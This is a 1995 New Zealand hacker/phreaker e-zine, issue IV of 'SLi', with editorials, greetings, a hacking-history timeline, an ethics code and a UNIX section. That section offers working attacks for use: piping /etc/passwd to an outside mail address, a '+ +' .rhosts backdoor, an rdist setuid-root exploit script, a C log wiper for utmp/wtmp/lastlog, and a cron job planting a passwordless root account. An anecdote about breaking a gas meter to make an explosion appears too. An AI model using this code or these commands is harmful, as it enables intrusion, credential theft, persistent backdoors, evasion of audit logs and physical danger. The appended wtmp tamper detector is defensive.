[ 01/04/95 SLi]
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ Welcome ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
Well, amazing! SLi IV. Let's see if we can keep this up.
If you want a letter to the editor or something like that
in here, send it (or any comments, etc.. ) to:
SLi
PO Box 3030
Onekawa
Napier
New Zealand
OR
Internet E-mail Address:
HACKER_M@IX.WCC.GOVT.NZ
OR
Call SLi BBS if you can find where it is
Please read SLi I, II & III if you have trouble with
any terms in this mag.
SLi mag written by New Zealanders for New Zealanders!
Oh, before I forget, we have a NEW editor (I'm still here tho').
CyntaxEra is now a Co-Editor and designer of the mag. Its
outlay and overall presentation is her domain, well unless I
get bossy.
I N D E X
---------
Welcome ........................... Eon
The Rules ......................... Eon
Aunty Cyntax'Z Nutty noteZ ........ CyntaxEra
The Police ........................ Eon
Time Line ......................... Eon
Books 2 Read ...................... SLi
[In]Famous Quotes ................. Eon
Honour ............................ Eon
Unix .............................. Compiled by Eon
Busted 4 Nothing .................. Eon/Cyntaxera
The SLi Archive Subject list ...... Eon
Fake Mail ......................... Eon
Elements of Data Deprotection ..... Thorium
Review: 'ToT' ..................... CyntaxEra
SLi ............................... Eon
COCOT Phreaking in NZ ............. CyntaxEra
SmYte List ........................ SLi
Editors Knotez .................... Eon
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ The Rules ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
Okay, here are the rules for the SLi mag.
The entire mag is (C)opyright 1995 SLi
(1)
If you are working for a business that has some interest in the information
contained in this mag, you must send WRITTEN notification that you are in
possession of this [or any of the other SLi mags] to the following address:
SLi-Comp
PO Box 3030
Onekawa
Napier
New Zealand
Enclose your name, your company's name, address, and phone/fax number.
If you send an IBM formatted 720 disk and a SASE, we will send you the next
SLi mag. A donation of $5 is asked for however - as YOU can afford it (unlike
SOME of our readers).
(2)
This mag may not be edited, and no SINGULAR part may be quoted in any way!
However, the ENTIRE mag may be reproduced, but a charge of $1000 NZ will be
expected to be paid to the following address BEFORE any such reproduction.
SLi-Payment
PO Box 3030
Onekawa
Napier
New Zealand
Enclose your name, your company's name, address, and phone/fax number.
The fee must be paid in $CASH$. I, the editor, reserve the right
to revoke your rights to reproduce this mag at ANY time.
You may, if you are NOT a company, business or in any way connected to law
enforcement or Telecom Security/Risk Management, produce ONLY TWO hard-copies
for no charge.
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ Aunty Cyntax'Z Nutty noteZ ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
'lo out there yet again.. I can't believe it.. already issue #4.. Quite amazed
we've managed to get out another issue before anything drastic had happened
to restrict our printing, but even so, tough.
Well, anyhowz, I guess I'll do some greetz (considering I didn't do any in the
last issue..)..
Greetz go out to: [in absolutely NO order at all..]
SCoJaCK, Shatter, LexicnDvl, BooYaa [Sorry 'bout not contributing anyfink to
WPoS yet, but I've been a bit busy wif SLi stuff.. will get 'round to it if you
still want summink.. ;)], Tele [how's the bf/husband? ;)], max-q, ChezeHead,
motley, t00ph [sL0ppY or whatever you're callin' y'self now], Hellfire, D-FENS,
DTangent, GreYLocK, eck, Baccahbar, Wacko, PurpCon, noise, SSerpent, Serpent,
UtahSaint, phigan, JuLieT, Mindscrew, Solctice, Speed_Rcr, Hypnosis, wr, SsX,
UnderDeaD, HomeySan, hotrod, pyr0tech, Gen-X, Harl, kluge, Radikahl, Velcro,
qwiksilver, Datarape, TimeLord, Cellphone, neophyte, Snidely, 7up, Zibby -
(where the hell are you?), Thorium, XANTh, WiRED, Nitro-187, xn4rk, zaph0d,
Lestat, Visionary [Pat], DrMenace, GAnarchy, Freiheit, Opp, erikt.
[..and the rest of you hack/phreak guys/gals! Couldn't list y'all.. sorry
- maybe all that p0t actually HAS gone to my head.. ugh. ;)]
Sooo, any gossip this time 'round? Not really. *yawn* Very quiet lately which
means that there isn't much to talk about.. oh yeah...
CyntaxEra + R-A-D = eX-poTheaDz... *sigh* well... for a while anywayz.. =)
Doesn't that show how little there is to say this time round?! Uh, I guess
I could beg and plead for pieces of gossip to head our way (yup, even BBS ads
will be accepted.. I guess.. hmm.. maybe we'll add a special column for 'em..
Well, if there's enuf submitted, that is..)..
Hopefully, you guyz at ToT didn't get offended by my review - I tried to be as
HONEST as I could be without being TOO cutting (I got told I was a little harsh
with the comments, but I felt that they were appropriate - it's only an opinion
so don't take it personally.. =) ). Well, to you other readerz out there who
aren't in ToT, give it a read - you may find it amusing.. =)
Oh, it's a pity that I've been informed that ToT#2 was going to be the last
issue - it had promise [*flashbacks to SLi Issue #1 and remembers that we
hadn't really started out TOO magnificently* Mind you... it was a start].
Telco seems to be backing down for a bit, but that doesn't mean that they've
stopped 'investigating' 'n' stuff, but at least they're giving us a break! =)
[Ed's Note: Actually Cyntax, Heather is too busy to work on that, so she
says. She's a nice woman - just a bit slY <excuse the pun>
WELL [NEW INFO JUST ADDED] Maybe she's nice but the BOSS dude
ISN'T. He's a LAMER! Cutting off poor Cyntax's 3-way GRRRR]
Special note to "THE FLY" - You've pissed me off once too often, and after
hearing of your comments, you'll get what's coming for you. Oh, and I'm sure
you enjoyed the "$2,000 phone call" from AT&T - so I was informed. They were
doing a bit of a crackdown on fone-phreaks and your name popped up somehow.
Pity they're too far away to seriously do something about it - don't think
they could be bothered, huh?
That's about it from me.. for now
'Till next issue (well, next article anyway.. ;) )... over and OUT.
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ The Police ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
-The Police-
Ahh, now, this is a laugh and it was VERY boring, but here goes anyway...
We ALL know police, don't we? Now, I thought that police were there to
protect, BUT....
It all happened one EARLY morning - about 5am. We were, uh, well, breaking
into a gas-meter to get some gas to fill a rubbish bag with to make a bit of
a large explosion somewhere in the metropolitan area. Now, sadly :( me and
another individual were smacking the shit outta this gas meter's pipes and
we hear a car driving towards where we were. We [by the way, we were in a
car - not at that moment, obviously] dropped the crowbar [that's what we were
talking to the gas-meter with] and hid behind the car.
Unfortunately, the police had seen us, so I [holdin' a spanner] tried to look
like we were undoing the wheel [There was a stone in it. Well, that was the
story anyway]. Now, the cops asked us questions, searched our car for drugs
and basically harassed us until EXACTLY 6:30am [it mighta been 5:30am].
Anyway, I was informed that that is the EXACT time the police go home, so all
we were was a 'time-waster'.
I must admit that I have lost some respect I had for the boys/'girl-boys' in
blue. The car-driver's mom got called and he got in shit. We had to walk
back and pick up the crowbar we had left 'hidden in plain sight' - they
somehow managed to miss it - and basically, we had a really bad day [morning]...
BTW - Cops ask really STUPID questions!
Cop: Why is there broken glass near that car??
Me: I dunno, but if you were a _real_ detective, you would notice
that the broken glass is nowhere near the broken window.
Obviously the car has been moved since the glass was broken so
we CAN'T have done it.
Cop: You ever had a run in with us before?
Me: [thinking]
What a fucking stupid question to ask! I told you my name so
why don't you just look it up?
[saying]
Just the usual - being out late and getting stopped. Nothing
really.
Cop from
Vice squad: Been smoking any dak? [dak = pot/green plant/cannabis ]
A friend: I wish.
Well, I have no problems with police, except that _SOME_ policewomen have a
really bad attitude and that some policemen think that they are god's gift
to the world. But, the police do a job that MUST be done. I salute them
for it... BUT, Mr/Ms Police Officer, take my advice and do what is
righteous and just, not necessarily what is legal.
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ TIME LINE ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
Well, here we have it. A timeline of events in the H/P world.
Now, I might have screwed up a few things so please no mail bombs
and bear with me.
Information and Dates have been taken from:
"The Hacker Crackdown" ---- Bruce Sterling
"THEFT OF COMPUTER SOFTWARE A NATIONAL SECURITY THREAT" ---- William J. Cook,
Assistant U.S. Attorney
PGP DOX ---- Author Unknown at time of Publication.
"The History of LOD/H Revision #3 May 1990" ---- Lex Luthor
U.S. Newswire Articles ---- Author Unknown at time of Publication.
News Article, Pump-Con Bust -03/11/1992- ---- Barbara E. McMullen and
John F. McMullen
and finally, my own knowledge.
KEY:
Okay, the only major thing I should explain is, the use of
"Sometime." and "Sometime?". A question mark means I'm not sure
WHEN it happened in that year. A "." means I'm not sure of which
month things happened, but it was in this order.
-=[ Our History ]=-
1865:
U.S. Secret Service (USSS) founded.
1876:
Alexander Graham Bell invents telephone.
1878:
First teenage males flung off phone system by enraged
authorities.
1939:
"Futurian" science-fiction group raided by Secret
Service.
1971:
Yippie phone phreaks start YIPL/TAP magazine.
1972:
*Ramparts* magazine seized in blue-box rip-off
scandal.
1978:
Ward Christenson and Randy Suess create first
personal computer bulletin board system.
1982:
William Gibson coins term "cyberspace."
1982:
"414 Gang" raided.
1983-1984:
AT&T dismantled in divestiture.
1984:
Congress passes Comprehensive Crime Control Act
giving USSS jurisdiction over credit card fraud and
computer fraud.
1984:
the U.S. Department of Commerce placed expanded export
controls on computer software as part of its general
protection of technical data deemed vital to the
national defense and security of the United States.
1984:
"Legion of Doom" formed.
January. "PLOVERNET" went online. [A H/P BBS]
Sometime? "LOD BBS" goes online.
Sometime? Groups such as "Fargo 4A" and "Knights of Shadow"
form.
Sometime May?. "KOS" breaks up.
1984:
*2600: The Hacker Quarterly* founded.
1984:
*Whole Earth Software Catalog* published.
1985:
First police "sting" bulletin board systems
established.
1985:
Whole Earth eLectronic Link computer conference (WELL)
goes on-line.
1986:
Computer Fraud and Abuse Act passed in USA.
1986:
Electronic Communications Privacy Act passed in US.
1987:
Chicago prosecutors form Computer Fraud and Abuse
Task Force.
July/September. A Chicago youth attacked AT&T computers at Bell Labs
in Illinois and New Jersey, at a NATO missile support
site in North Carolina, and at Robbins Air Force Base.
1988:
July. Secret Service covertly videotapes "SummerCon" hacker
convention.
September. "Prophet" cracks BellSouth AIMSX computer network and
downloads E911 Document to his own computer and to
Jolnet.
September. AT&T Corporate Information Security informed of
Prophet's action.
October. Bellcore Security informed of Prophet's action.
October. Scotland Yard arrested an English attacker who had
broken into over 200 military, corporate, and
university computers in the United States and Europe.
November 2. A college undergraduate planted a computer virus that
temporarily disabled 6,000 computers on the Internet
[* The Internet Worm *]
December. A search warrant filed by U.S. Customs agents in
Chicago disclosed that a confederate of the Yugoslav
Consul-General in Chicago was using a hacker to attack
defense contractors by remote access in order to steal
computerized information. According to the affidavit,
the information obtained by the hacker was
subsequently smuggled out of the United States in
diplomatic pouches with the help of the Consul-
General.
1989:
January. Prophet uploads E911 Document to Knight Lightning.
February 25. Knight Lightning publishes E911 Document in *Phrack*
electronic newsletter.
March. It was disclosed that West German hackers sponsored
by Eastern Bloc intelligence agencies had been
systematically searching for classified information
on Government computers throughout the United States
through a weakness in a computer network at a
California university.
[* Pengo and Operation Equalizer *]
March. A member of the Soviet military mission in Washington,
DC, was arrested and expelled from the United States
for attempting to obtain technical information about
how U.S. Government classified information is secured
in computers.
April. Canada expelled 19 Soviet diplomats for wide-ranging
espionage operations to obtain Canadian defense
contractor information for military and commercial
purposes.
May. Chicago Task Force raids and arrests "Kyrie."
June. "NuPrometheus League" distributes Apple Computer
proprietary software.
June 13. Florida probation office crossed with phone-sex line in
switching-station stunt.
July. "Fry Guy" raided by USSS and Chicago Computer Fraud
and Abuse Task Force.
July. Secret Service raids "Prophet," "Leftist," and "Urvile"
in Georgia.
1990:
Sometime? PGP (Pretty Good(tm) Privacy) created by
Philip Zimmermann.
January 15. Martin Luther King Day Crash strikes AT&T
long-distance network nationwide.
January 18-19. Chicago Task Force raids Knight Lightning in
St. Louis.
January 24. USSS and New York State Police raid "Phiber Optik,"
"Acid Phreak," and "Scorpion" in New York City.
February 1. USSS raids "Terminus" in Maryland.
February 3. Chicago Task Force raids Richard Andrews' home.
February 6. Chicago Task Force raids Richard Andrews' business.
February 6. USSS arrests Terminus, Prophet, Leftist, and Urvile.
February 9. Chicago Task Force arrests Knight Lightning.
February 20. AT&T Security shuts down public-access "attctc"
computer in Dallas.
February 21. Chicago Task Force raids Robert Izenberg in Austin.
March 1. Chicago Task Force raids Steve Jackson Games, Inc.,
"Mentor," and "Erik Bloodaxe" in Austin.
May 7,8,9. USSS and Arizona Organized Crime and Racketeering
Bureau conduct "Operation Sundevil" raids in
Cincinnati, Detroit, Los Angeles, Miami, Newark,
Phoenix, Pittsburgh, Richmond, Tucson, San Diego,
San Jose, and San Francisco.
May. FBI interviews John Perry Barlow re NuPrometheus case.
June/July. Mitch Kapor and Barlow found Electronic Frontier
Foundation; Barlow publishes *Crime and Puzzlement*
manifesto. [*The official EFF "about.eff" says
EFF founded in July*]
July 10. Members in LOD plead guilty
July 24-27. Trial of Knight Lightning.
1991:
Sometime? US Senate Bill 266, an omnibus anti-crime bill,
had an unsettling measure buried in it.
If this non-binding resolution had become real
law, it would have forced manufacturers of secure
communications equipment to insert special "trap
doors" in their products, so that the US Government
can read anyone's encrypted messages.
This measure was defeated after rigorous protest from
civil libertarians and industry groups.
March 25-28. Computers, Freedom and Privacy conference in San
Francisco.
May 1. Electronic Frontier Foundation, Steve Jackson, and
others file suit against members of Chicago Task
Force.
July 1-2. Switching station phone software crash affects
Washington, Los Angeles, Pittsburgh, San Francisco.
July 8. MOD indictments filed against MOD members Julio
Fernandez, aka. "Outlaw," John Lee, aka. "Corrupt,"
Mark Abene, aka. "Phiber Optik," Elias Ladopoulos,
aka. "Acid Phreak," and Paul Stira, aka. "Scorpion,"
February. CPSR Roundtable in Washington, D.C.
September 17. AT&T phone crash affects New York City and three
airports.
1992:
Sometime? FBI Digital Telephony wiretap proposal was introduced
to Congress. It would require all manufacturers of
communications equipment to build in special remote
wiretap ports that would enable the FBI to remotely
wiretap all forms of electronic communication from FBI
offices.
March 11. New York Police Department has announced the arrest of
Randy P. Sigman, 40; Ronald G. Pinz, Jr, 21; and Byron
J. Woodard, 18 for the alleged crimes of Unauthorized
Use Of A computer and Attempted Computer Trespass,
both misdemeanors. Also arrested was Jason A. Brittain
22 in satisfaction of a State of Arizona Fugitive From
Justice warrant. The arrests took place in the midst
of "PumpCon".
1993:
Sometime. SLi BBS goes up in NZ.
March 21. SLi gets national TV coverage from TVNZ.
April 16th. US Government-built encryption device, called the
"Clipper" chip, containing a new classified NSA
encryption algorithm. The Government is encouraging
private industry to design it into all their secure
communication products. The catch: At the time of
manufacture, each Clipper chip will be loaded
with its own unique key, and the Government gets to
keep a copy.
June. DC busts - A 2600 meeting is broken up by mall cops
and police.
1994:
March. TNO [The New Order] gets busted; Flatline BBS is
raided.
Sometime. Unlucky person nailed in Auckland, NZ, for around
$250,000 of fone fraud concerning NZ Telecom
($200,000) and AT&T ($40,000).
Sometime. Phreak in Wellington busted for beige boxing by
Clear Communications, NZ.
Sometime. Big Calling Card investigation in NZ - "Motley" in
Sweden is busted in conjunction with CC'z - no major
charges are laid.
June 10. "Deathstar" gets busted - no charges laid.
August 6. "Tooph" makes front page news with his alliance conf
calls - One was a call to NZ for 293 mins costing
$306.
Sometime. "MrPurple" busted for US$40,000 worth of conference
charges. [* At time of publication, in jail =( *]
Late/Early95. NZ Telecom hassles Wellington phreaks about VMB
hacking. [how lame!].
1995:
January. Wellington H/P'ers hunted down by Victoria University
(with a little help from local cops) 'cos someone got
'OPERATOR' on their boxes.
[Yeah, wasn't 'root' but it scared 'em enuf!]
February 17. Hacker Busted in USA for 20.000 credit cards
Kevin Mitnick aka Condor
March 22. S.A.M.S.O.N meeting in Wellington, New Zealand
"1. To identify interested parties in joining our
proposed organisation - namely SAMSON - Software
and Modem System Operators Network!
2. To establish and agree on a formal code of ethical
practices for the successful running of a public
BBS." [* well they will wanna shut me down, won't
they! :P *]
-eof-
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ [In]Famous Quotes ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
----Eon,---Grasshopper-+-others---in--a---car----
Eon: "Let's go crash some place."
Grasshopper: "I hope you meant as in sleeping."
Grasshopper: "He's `Joe-average'"
Eon: "He's `Joe-BELOW average'"
George: "I'll lock you out of my Bulletin Board and give you twit
access forever! Ahh ahahahaha!" [spoken in a voice like he
had an award winning carrot up his ass]
Cardinal: "Dial '111' and make a cop come."
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ Honor ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
Honor.
For a hacker to justify his/her actions, he/she must have a guideline of rules
of morals - a sense of honour. Some do, some don't, but I hope to show you
what Hack/Phreak people's ethics should be, in my opinion.
1. For a start, injuring a single person;
CC abuse is wrong. It is not ethical. Our fight is not against the
little man or woman - our fight is against the profiteering companies
and hiracial[sp?] government departments. We do not steal from the
poor, and the helpless, and in a sense, that is what CC fraud is most
of the time. Sure, occasionally you get some rich guy with 40 grand
in his account, but those times are few and far between. Basically CC
fraud is out.
<Of course, if a company is "lame" enough to accept a checksum's credit
card - it's up to you!>
Beige boxing is out also, unless you're phreaking from an embassy,
government department or Telecom [AT&T, Telco.. etc...] phone box.
2. You're not an anarchist [in the explosive terms]. It only gives us a bad
name.
3. Destroying data, except for covering your tracks, is out.
4. Your world is that of the computer and the phone. Our world is safe
from the problems of racial prejudice, sexual discrimination, discriminate
by what someone says - not what they look like, sound like, or
what their beliefs are.
5. Our word of honour is PERMANENT. If given, NEVER break it. If you do,
you are no more worthy of your position in society than a murderer or a
rapist.
6. Respect all others' points of view - even if it is foolish.
7. NEVER attack anything if it hasn't done anything to you.
[Hmm, does that include kicking poor, little, defenseless PUPPIES!?]
8. Don't talk behind others' backs. If you want to say something, say it to
their face. Only dishonourable people don't tell people what they think,
but tell others instead. <maybe I should take notice of this one!>
Remember, our war is the war that will shape the future. If we are not
ever diligent, we will lose our rights as an individual - we will become
nothing more than a number. Governments love numbers, as do all money
making companies. Protect the little free speech and the few rights we
have left. Protect them well, my brethren, for we will need it one day
more than we will need anything else.
Above all, our war is directed at big businesses and governments, not towards
random people in our streets.
Eon.
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ UNIX ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
UNIX is an OS used by "ALL SMART people" - I'm biest[sp?]. 80* processors
can use it, although 8088's will have to use a UNIX-like OS - not a UNIX OS
but 486's, 386's, Pentiums, and the like, can run it. SUN box's and VAX's
can run it. In fact, that's the amazing thing about Unix - it's PORTABLE!
Anyway, away from the dribble.
I guess I'll start at the top.
Basic UNIX username/password prompt:
login:
Password:
This CAN be changed. After all, with UNIX, you get the source to everything.
One good thing with UNIX is that the password file is globally readable unless
the system administrator has enabled a shadow password system - not standard
with unix. The passwords are in:
/etc/passwd
Mind you this can be changed also. After all, with UNIX, you get the source
to everything.
A UNIX passwd file looks like this:
root:FO0Cj1eXP1So.:0:20:The Superuser:/root:/bin/tcsh
jones:wS31XtSkN8H0.:1023:20:Eric Jones,cb234,,:/u/staff/jones:/bin/tcsh
peter:4gjxaKBycRUjE:1024:20:Peter Hall,,,:/u/staff/peter:/bin/tcsh
jmm:0PmsQGJvUVvfQ:1025:20:Joe Morris,,,:/u/staff/jmm:/usr/sbin/suspended
bmckenna:GIP1BJAf83Oi6:1029:20:Bill McKenna,,,:/u/others/bmckenna:/bin/tcsh
jonathan:3.A8QX3BfCdm6:1030:23:Jonathan Stone,,,:/u/others/jonathan:/bin/tcsh
mike:zMS3vvmSnn0bc:1033:20:Mike Doyle,CC404,8874,:/u/staff/mike:/bin/tcsh
paula:s4drmoa6xnJPI:1036:23:Paula Hine,,,:/u/others/paula:/bin/passwd
anthea:Slq/SPUf75UK2:1038:23:Anthea Grob,,,:/u/others/anthea:/bin/passwd
ladner:zUAhxM/sSqKbY:1045:20:Richard Ladner,cb207,,:/u/others/ladner:/bin/tcsh
user:PeqTb4v4Cc1Ak:1050:23:Temporary Guest Account,,,:/u/others/user:/bin/tcsh
andreae:uLUDo39sS3QmE:1052:23:Andreae Family:/u/others/andreae:/bin/tcsh
The layout may differ between UNIXes, but this is the standard layout:
Username:Password:UserID:GroupID:InfoOnUser:UsersHomeDir:User'sShell
You will notice that the second field is the password one. UNIX uses a
one-way password encryption system. When you login and type your password, it
encrypts your input and compares the result to the user's password field.
If it is the same, you've got the password right.
Say you want to crack the passwords. You have to do the same. Encrypt a
sequence of letters/numbers/symbols and compare it to the password file.
Luckily there are programs that do this. They DON'T go "aaaaa aaaab aaaac..".
What you get is a dictionary file which looks like this:
autistic
auto
autobiography
autoclave
autocollimate
autocorrelate
autocracy
autocrat
autocratic
autograph
automat
automata
automate
automatic
The reason for this - using dictionary words - is that a LOT of people just
use common words as their passwords. Having to attack ("crack") using every
number/letter/symbol sequence UNIX can handle would take a LONG time.
The names of some good proggies that crack these passwords are:
Program Name     File Name             <OS>
~~~~~~~~~~~~     ~~~~~~~~~             ~~~~
Cracker Jack     jack13.zip/jack.zip   <PC Only - VERY FAST!!>
Killer Cracker   kc9??.zip             <Anything. After all, you get the
                                       source to it>
Useful commands to type WHENEVER you get onto ANY UNIX system:
[] = Don't type - instructions
* = What you type
This will "type" the password file to your terminal:
[open a capture if on a modem link]
*cat /etc/passwd [or]
*ypcat passwd
This will mail you the password file via internet mail:
*cat /etc/passwd | mail -s passwordfile [where you want to send the file to via
internet mail; i.e. bloggs@some.where.com]
*ypcat passwd | mail -s passwordfile [where you want to send the file to via
internet mail; i.e. bloggs@some.where.com]
Also type this:
*echo + + >> ~/.rhosts
This will allow you (if it's installed) to type:
*rsh <system.name.you.echoed.that.to> -l <UsernameOfUserYouUsed> /bin/sh -i
Okay, so say the user you echoed + + on was called "bob" on
lame.aol.com. You would type:
*rsh lame.aol.com -l bob /bin/sh -i
This might or might not work, depending on how the system is setup, but if
you were on lame.aol.com, it's a reasonable bet after typing that command you
would then become bob with his rights, and access to his files.
Well I thought about it and decided to put some useful source in here for
those interested.
Okay, this piece of shell script on non-patched systems will give you root.
Upload this file into a directory as <filename>.
When in shell on the UNIX box type:
*chmod 777 <filename>
*./<filename>
*/tmp/." "
If a # appears, type:
*whoami
If it says "root" you have root on that UNIX box.
NB: Because of the way this file is, where ! is wrap the nextline onto that
line and delete the "!" - except for the "#!" on the first line.
---------------------------CUT----------------------------8<------------------
#!/bin/sh
SUID=/tmp/." "
cat <<_EOF_ > test
Taaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Qaaaaaaaaaaaaaaaaaaaaaaaaaa
Qaaaaaaaaaaaaaaaaaaaaaaaaa
Qaaaaaaaaaaaaaaaaaaaaaaaa
Qaaaaaaaaaaaaaaaaaaaaaaa
Scp /bin/sh $SUID
Schmod 4755 $SUID
_EOF_
cat test | /usr/ucb/rdist -Server localhost
rm -rf test
if [ -f $SUID ]; then
echo "$SUID is a setuid shell. "
fi
-------------------------CUT-------------------------------8<------------------
The program following will hide you on a UNIX box.
It will work on SunOS 4.+ if you are a normal user and utmp has o+w, or if
you are root.
-------------------------CUT-------------------------------8<------------------
#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <utmp.h>
#include <lastlog.h>
#include <pwd.h>
int f;
void kill_tmp(name,who)
char *name,
*who;
{
struct utmp utmp_ent;
if ((f=open(name,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}
void kill_lastlog(who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;
if ((pwd=getpwnam(who))!=NULL) {
if ((f=open("/usr/adm/lastlog", O_RDWR)) >= 0) {
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));
close(f);
}
} else printf("%s: ?\n",who);
}
main(argc,argv)
int argc;
char *argv[];
{
if (argc==2) {
kill_tmp("/etc/utmp",argv[1]);
kill_tmp("/usr/adm/wtmp",argv[1]);
kill_lastlog(argv[1]);
printf("Zap!\n");
} else
printf("Error.\n");
}
-----------------------------CUT---------------------------8<------------------
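Seen from the admin's side, a zapper like the one above leaves gaps you can look for. The added example below (not part of the original mag) scans a wtmp-style log for records overwritten with zeros and for logout records with no matching login. The 36-byte big-endian record layout, the "~" reboot marker and the sample records are assumptions constructed for the demo.

```python
"""Added example: spot tampering in a fixed-record wtmp-style login log."""
import struct

# Assumed BSD/SunOS 4 style record: ut_line[8], ut_name[8], ut_host[16] and a
# 32-bit ut_time, big-endian as on SPARC. Adjust REC for your platform.
REC = struct.Struct(">8s8s16sI")


def record(line, name, host, when):
    """Pack one record; struct pads the short strings with NUL bytes."""
    return REC.pack(line.encode(), name.encode(), host.encode(), when)


def scan_wtmp(buf):
    """Return (record_index, finding, tty) tuples for suspicious records."""
    findings = []
    logged_in = set()                      # ttys with a login but no logout yet
    whole = len(buf) // REC.size
    for idx in range(whole):
        raw = buf[idx * REC.size:(idx + 1) * REC.size]
        if not any(raw):
            # Assumption: genuine records always carry a tty and a timestamp,
            # so an all-zero record inside wtmp means an entry was overwritten.
            findings.append((idx, "zeroed-record", ""))
            continue
        line, name, _host, _when = REC.unpack(raw)
        tty = line.rstrip(b"\0").decode("ascii", "replace")
        user = name.rstrip(b"\0").decode("ascii", "replace")
        if tty == "~":                     # assumed BSD reboot/shutdown marker
            logged_in.clear()
        elif user:                         # login record: tty and name set
            logged_in.add(tty)
        elif tty in logged_in:             # logout record: tty set, name empty
            logged_in.discard(tty)
        else:
            # The logout survived but its login did not: a wiper that matches
            # on the user name never touches logout records, which have none.
            findings.append((idx, "logout-without-login", tty))
    if len(buf) % REC.size:
        # Leftover bytes that do not fill a whole record.
        findings.append((whole, "truncated-record", ""))
    return findings


# Constructed sample: bob's login on ttyp1 (record 2) has been blanked.
SAMPLE_WTMP = b"".join([
    record("~", "reboot", "", 796000000),
    record("ttyp0", "alice", "host-a", 796000100),
    bytes(REC.size),
    record("ttyp0", "", "", 796000500),
    record("ttyp1", "", "", 796000600),
])

if __name__ == "__main__":
    for idx, finding, tty in scan_wtmp(SAMPLE_WTMP):
        print(f"record {idx}: {finding} {tty}".rstrip())
```

A log that was rotated while people were logged in starts mid-session, so a logout-without-login near the top of a fresh file needs a look at the previous file before you call it tampering.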
When you get root, find where the crontabs are put, and type this:
*cat <WhatYouCallThisFileName> >> <crontabdir>/root
-------------->8--------------Cuthere------------------------------------------
0 1 * * * cp /etc/passwd /var/adm/". "
1 1 * * * chmod +w /etc/passwd
2 1 * * * echo "blah::0:0:A tempory account:/:/bin/sh" >> /etc/passwd
1 2 * * * mv /var/adm/". " /etc/passwd
2 2 * * * chmod -w /etc/passwd
-------------->8--------------Cuthere------------------------------------------
Every day from 1 AM to 2 AM, there will be an account called "blah" with root
access and no password.
